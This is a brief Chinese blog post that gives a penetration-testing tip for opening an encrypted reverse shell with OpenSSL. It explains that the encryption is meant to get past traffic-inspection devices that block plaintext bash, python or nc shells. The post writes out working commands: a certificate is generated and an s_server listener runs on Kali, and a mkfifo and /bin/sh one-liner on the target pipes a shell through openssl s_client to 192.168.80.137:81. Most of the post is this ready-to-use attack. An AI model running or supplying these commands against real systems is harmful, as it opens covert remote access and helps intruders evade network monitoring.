小技巧-使用OpenSSL反弹加密shell
2019-10-12 本文已影响0人
Instu
渗透测试人员通常喜欢使用bash、python、nc等方式反弹shell。以上方式有一个共同的缺点,所有的流量都是明文传输,很容易被各种流量审查设备阻断。下面介绍使用openssl反弹一个加密的shell。
- 在kali上生成SSL证书的公钥/私钥对
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
- 在kali上监听81端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 81
- 在目标机器上用openssl反弹加密shell
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.80.137:81 > /tmp/s; rm /tmp/s
image.png
image.png